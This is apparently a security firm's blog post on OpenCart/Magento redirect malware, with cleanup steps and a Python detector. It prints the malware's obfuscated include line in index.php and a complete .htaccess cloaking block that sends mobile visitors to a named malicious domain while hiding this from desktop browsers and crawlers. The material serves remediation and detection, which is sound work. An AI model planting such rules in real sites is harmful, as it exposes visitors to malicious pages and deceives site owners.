
OpenCart & Magento Malware Redirecting to Malicious Advertising Websites – Steps to Find & Fix

Updated on: March 1, 2021

An OpenCart & Magento malware that redirects both desktop and mobile visitors to malicious links has been doing the rounds. Over the last week we have handled several cases of it. No specific versions are being targeted: we have seen this infection across a wide range of Magento & OpenCart versions.

Also check our detailed blog post on the different types of malicious redirection and how to fix them.

How Does the Infection Look?

Ahead of the Black Friday & Cyber Monday sales, this malware redirects anyone who visits the infected website to a site carrying "offers". The destinations we have seen either show such offers or graphic content from porn-like websites. One customer who came to us had managed to remove parts of the malware from the desktop website, but it persisted on the mobile website. In some cases the redirection only happens via Google search (if you search for your site in Google & then click on the result), not when the URL is typed directly. This is cloaking: the redirect is shown to real visitors but hidden from the site owner and from search engine crawlers, which keeps the infection unnoticed for longer while still hurting your SEO badly once Google does catch it. Here's how a website infected with this OpenCart & Magento redirect malware looks:

Consequences of Redirection Malware:

  • Redirection of visitors to malicious websites
  • Negative effect on search results
  • A spike in 404 pages being created
  • Errors and warnings in Google Search Console (formerly Google Webmaster Tools)
  • Increase in malicious files on the server
  • Decrease in traffic & sales as a result of all of the above

How to Find & Fix this OpenCart & Magento Malware Website Redirection Spam:

The steps below may advise you to delete pieces of code. However, hackers sometimes make malicious code look legitimate, so before deleting any file or code, take a full backup (files and database). Below are the steps to find & fix:

  • Check the index.php file: We found malicious code included at the top of the index file. The malicious part is encoded, and it is difficult to tell what it does without decoding it. Here's a snippet:
    <?php
    /*2e920*/
    // Injected block: everything between the two /*2e920*/ markers is the malware.
    // The "@" suppresses PHP errors if the file is missing; the "\xNN" escapes decode
    // to an absolute path under the site's public_html, where the real payload lives.
    @include "\x2fh\x6fm\x65/\x6ez\x67a\x72d\x65n\x2fp\x75b\x6ci\x63_\x68t\x6dl\x2fs\x79s... [[MALICIOUS CODE]]";
    
    /*2e920*/
    // From here on this is the stock OpenCart 2.0.1.0 index.php.
    // Version
    define('VERSION', '2.0.1.0');
    
    // Configuration
    if (is_file('config.php')) {
    	require_once('config.php');
    }
    
    // Install
    if (!defined('DIR_APPLICATION')) {
    	header('Location: install/index.php');
    	exit;
    }
    
    // Startup
    require_once(DIR_SYSTEM . 'startup.php');
    
    // Registry
    $registry = new Registry();

    If you find this piece of code at the top of your index file, delete the lines between the two /*2e920*/ markers. Then decode the escaped path in the @include and delete the file it points to as well: that file holds the actual payload, and removing only the include line leaves it on the server. Check the index.php in /admin (and, on Magento, every index.php the web server can reach) the same way.

  • Be sure to check .htaccess: Another piece of the malware can be found in the .htaccess files on your server. Check the .htaccess in the web root as well as the one in the /admin folder. A snippet from the malware found in the /admin folder:
    
    RewriteEngine on
    # One [OR]-chained group: fires for any mobile User-Agent, WAP Accept type or WAP profile header
    RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} opera\ mini [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} blackberry [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} (pre\/|palm\ os|palm|hiptop|avantgo|plucker|xiino|blazer|elaine) [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} (iris|3g_t|windows\ ce|opera\ mobi|windows\ ce;\ smartphone;|windows\ ce;\ iemobile) [NC,OR]
    RewriteCond %{HTTP:Accept} (text\/vnd\.wap\.wml|application\/vnd\.wap\.xhtml\+xml) [NC,OR]
    RewriteCond %{HTTP:Profile} .+ [NC,OR]
    RewriteCond %{HTTP:Wap-Profile} .+ [NC,OR]
    RewriteCond %{HTTP:x-wap-profile} .+ [NC,OR]
    RewriteCond %{HTTP:x-operamini-phone-ua} .+ [NC,OR]
    RewriteCond %{HTTP:x-wap-profile-diff} .+ [NC]
    # Escape hatch: appending ?noredirect to the URL switches the redirect off (handy for the attacker's own testing)
    RewriteCond %{QUERY_STRING} !noredirect [NC]
    # Skip one specific emulator User-Agent
    RewriteCond %{HTTP_USER_AGENT} !^(Mozilla\/5\.0\ \(Linux;\ U;\ Android\ 2\.2;\ en-us;\ Nexus\ One\ Build/FRF91\)\ AppleWebKit\/533\.1\ \(KHTML,\ like\ Gecko\)\ Version\/4\.0\ Mobile\ Safari\/533\.1\ offline)$ [NC]
    # Never redirect desktop operating systems, crawlers (google, yandex, bot) or download tools, so the owner and search engines don't see it
    RewriteCond %{HTTP_USER_AGENT} !(windows\.nt|bsd|x11|unix|macos|macintosh|playstation|google|yandex|bot|libwww|msn|america|avant|download|fdm|maui|webmoney|windows-media-player) [NC]
    # Everything that got this far is sent off-site with a 302
    RewriteRule ^(.*)$ http://sswim.ru [L,R=302]
    

    Every line of this block is malicious. The [OR]-chained RewriteCond lines match mobile browsers (by User-Agent, WAP Accept types and WAP profile headers); the lines after them exempt requests carrying noredirect in the query string, one emulator User-Agent, desktop operating systems and crawlers; and the RewriteRule sends whatever is left to http://sswim.ru with a 302. That is why the customer mentioned above saw nothing in a desktop browser while the mobile site still redirected, and why Google's own crawler is not shown the redirect. If you find this code, remove the whole block immediately, then confirm the fix by requesting a page with a mobile browser User-Agent and checking that the response carries no off-site Location header.

  • Look for suspicious PHP files: This is the tricky part. Hackers usually give the files legitimate-looking names and put the malicious code in them. Often most of the code in such a file is harmless and only a couple of lines do the hacker's work. In this particular case we found files like enjoy.php & unzip.php in various OpenCart/Magento directories. Compare your directory tree against a clean copy of the same CMS version, and treat any PHP file that is not part of the release, or that was modified recently in an otherwise untouched directory, as suspect.

    (Screenshot of unzip.php.) This file, called unzip.php, allowed uploading of further malicious files to the server.
  • Webmasters don't lie: Google often warns you when it detects something fishy while indexing the website. And if Google is warning you, you should be worried, because this is when your search rankings take a hit. Something similar happened with the Japanese SEO spam, which is still going around. Here's an example of the many 404 pages created by the malware, as detected by Google:
    (Screenshot of the Google Search Console crawl error report.)
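To make the first two checks repeatable, here is an added example (not code from the original post, nor from Astra) that does two things: it decodes the hex-escaped path out of an injected @include, and it evaluates a RewriteCond chain the way mod_rewrite does, so you can see which visitors a given .htaccess would redirect without borrowing a phone. The index.php and .htaccess samples are constructed to resemble the snippets above (the .htaccess is abridged; the redirect domain is the one from the page). The simulator implements only the subset of mod_rewrite these rules use (HTTP_USER_AGENT, HTTP:* headers, QUERY_STRING, the NC and OR flags and "!" negation), not backreferences, RewriteBase or other server variables.

```python
import re

# ---- 1. index.php: decode escape-obfuscated include/require targets ---------
_ESC = re.compile(r'\\x[0-9a-fA-F]{2}|\\[0-7]{1,3}')
_INCLUDE = re.compile(r'@?\s*(?:include|require)(?:_once)?\s*\(?\s*"((?:\\x[0-9a-fA-F]{2}|\\[0-7]{1,3}|[^"\\])*)"')


def decode_php_escapes(s: str) -> str:
    """Turn PHP double-quoted \\xHH and \\NNN escapes back into plain characters."""
    return _ESC.sub(lambda m: chr(int(m.group(0)[2:], 16)) if m.group(0)[1] == 'x'
                    else chr(int(m.group(0)[1:], 8)), s)


def find_obfuscated_includes(php_source: str) -> list:
    """Decoded paths of include/require statements whose path uses escape sequences (stock CMS code never does this)."""
    return [decode_php_escapes(m.group(1)) for m in _INCLUDE.finditer(php_source)
            if _ESC.search(m.group(1))]


# ---- 2. .htaccess: which requests does the RewriteCond chain really redirect? ----
def _parse_htaccess(text: str) -> list:
    """(rule_pattern, target, rule_flags, preceding_conds) for every RewriteRule."""
    conds, rules = [], []
    for line in text.splitlines():
        parts = re.split(r'(?<!\\)\s+', line.strip())  # split on unescaped whitespace only
        if not parts[0] or parts[0].startswith('#'):
            continue
        flags = set()
        if parts[-1].startswith('[') and parts[-1].endswith(']'):
            flags = set(parts.pop()[1:-1].upper().split(','))
        if parts[0] == 'RewriteCond' and len(parts) == 3:
            conds.append((parts[1], parts[2], flags))
        elif parts[0] == 'RewriteRule' and len(parts) == 3:
            rules.append((parts[1], parts[2], flags, conds))
            conds = []  # conditions bind only to the next RewriteRule
    return rules


def _lookup(var: str, req: dict) -> str:
    """Resolve the mod_rewrite variables this malware relies on (anything else resolves to '')."""
    name = var[2:-1]  # strip %{ and }
    if name == 'HTTP_USER_AGENT':
        return req['headers'].get('user-agent', '')
    if name == 'QUERY_STRING':
        return req.get('query', '')
    if name.startswith('HTTP:'):
        return req['headers'].get(name[5:].lower(), '')
    return ''


def _conds_hold(conds: list, req: dict) -> bool:
    """mod_rewrite semantics: conditions are ANDed, except runs joined by [OR] form one OR group."""
    group_hit = False
    for var, pattern, flags in conds:
        negate = pattern.startswith('!')
        pat = pattern[1:] if negate else pattern
        hit = (re.search(pat, _lookup(var, req), re.I if 'NC' in flags else 0) is not None) != negate
        if 'OR' in flags:
            group_hit = group_hit or hit
            continue
        if not (group_hit or hit):
            return False
        group_hit = False
    return True


def redirect_target(htaccess: str, req: dict):
    """Target of the first off-site RewriteRule this request would trigger, else None."""
    for pattern, target, _flags, conds in _parse_htaccess(htaccess):
        if (target.startswith(('http://', 'https://')) and _conds_hold(conds, req)
                and re.search(pattern, req.get('path', 'index.php'))):
            return target
    return None


# ---- constructed samples, shaped like the snippets quoted in the article --------
SAMPLE_INDEX = r'''<?php
/*2e920*/
@include "\x2fh\x6fm\x65/\x73h\x6fp\x2fp\x75b\x6ci\x63_\x68t\x6dl\x2fs\x79s\x74e\x6d/\x2ex\x2ep\x68p";
/*2e920*/
define('VERSION', '2.0.1.0');
'''

SAMPLE_HTACCESS = r'''RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} opera\ mini [NC,OR]
RewriteCond %{HTTP:Accept} (text\/vnd\.wap\.wml|application\/vnd\.wap\.xhtml\+xml) [NC,OR]
RewriteCond %{HTTP:x-wap-profile-diff} .+ [NC]
RewriteCond %{QUERY_STRING} !noredirect [NC]
RewriteCond %{HTTP_USER_AGENT} !(windows\.nt|bsd|x11|unix|macos|macintosh|google|yandex|bot|libwww) [NC]
RewriteRule ^(.*)$ http://sswim.ru [L,R=302]
'''

ANDROID = 'Mozilla/5.0 (Linux; Android 10; Pixel 3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0 Mobile Safari/537.36'
DESKTOP = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0 Safari/537.36'
GOOGLEBOT = ANDROID + ' (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'


def make_request(user_agent: str, query: str = '') -> dict:
    """Minimal request object: lower-cased header names, query string and request path."""
    return {'headers': {'user-agent': user_agent, 'accept': 'text/html,application/xhtml+xml'},
            'query': query, 'path': 'index.php'}


if __name__ == '__main__':
    print('obfuscated includes:', find_obfuscated_includes(SAMPLE_INDEX))
    for label, ua in (('android', ANDROID), ('desktop', DESKTOP), ('googlebot', GOOGLEBOT)):
        print(f'{label:>10}: {redirect_target(SAMPLE_HTACCESS, make_request(ua))}')
```

Run against a real .htaccess and a copy of index.php, the two functions to call are find_obfuscated_includes() on the file contents and redirect_target() with the User-Agent your customers actually use; the android, desktop and googlebot samples reproduce the three behaviours described above (redirected, untouched, untouched), and adding noredirect=1 to the query string switches the redirect off exactly as the rules intend.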
Here's what you can do from here:

    Infections like these hit your business hard. Every hour of downtime costs customers and reputation and, most importantly, damages your search engine rankings. After infecting a website, hackers tend to leave backdoors that are difficult to detect even for tech-savvy people, so once the files above are cleaned, also change the admin, database and FTP/SSH passwords, update the CMS and its extensions, and take a lesson from hacks like these by putting a website firewall in front of the site that protects it 24x7x365.

    For now, if you need assistance fixing this mess, we'll be happy to do it for you. Just sign up here and our engineers will begin the cleanup within 10 minutes of your signing up.


    Shikhil Sharma

    Shikhil Sharma is the founder & CEO of Astra Security. Being involved with cybersecurity for over six years now, his vision is to make cyber security a 5-minute affair. Shikhil plays on the line between security and marketing. When not thinking about how to make Astra super simple, Shikhil can be found enjoying alternative rock or a game of football. Astra Security has been rewarded at Global Conference on Cyber Security by PM of India Mr. Narendra Modi. French President Mr. François Hollande also rewarded Astra under the La French Tech program. Astra Security is also a NASSCOM Emerge 50 company.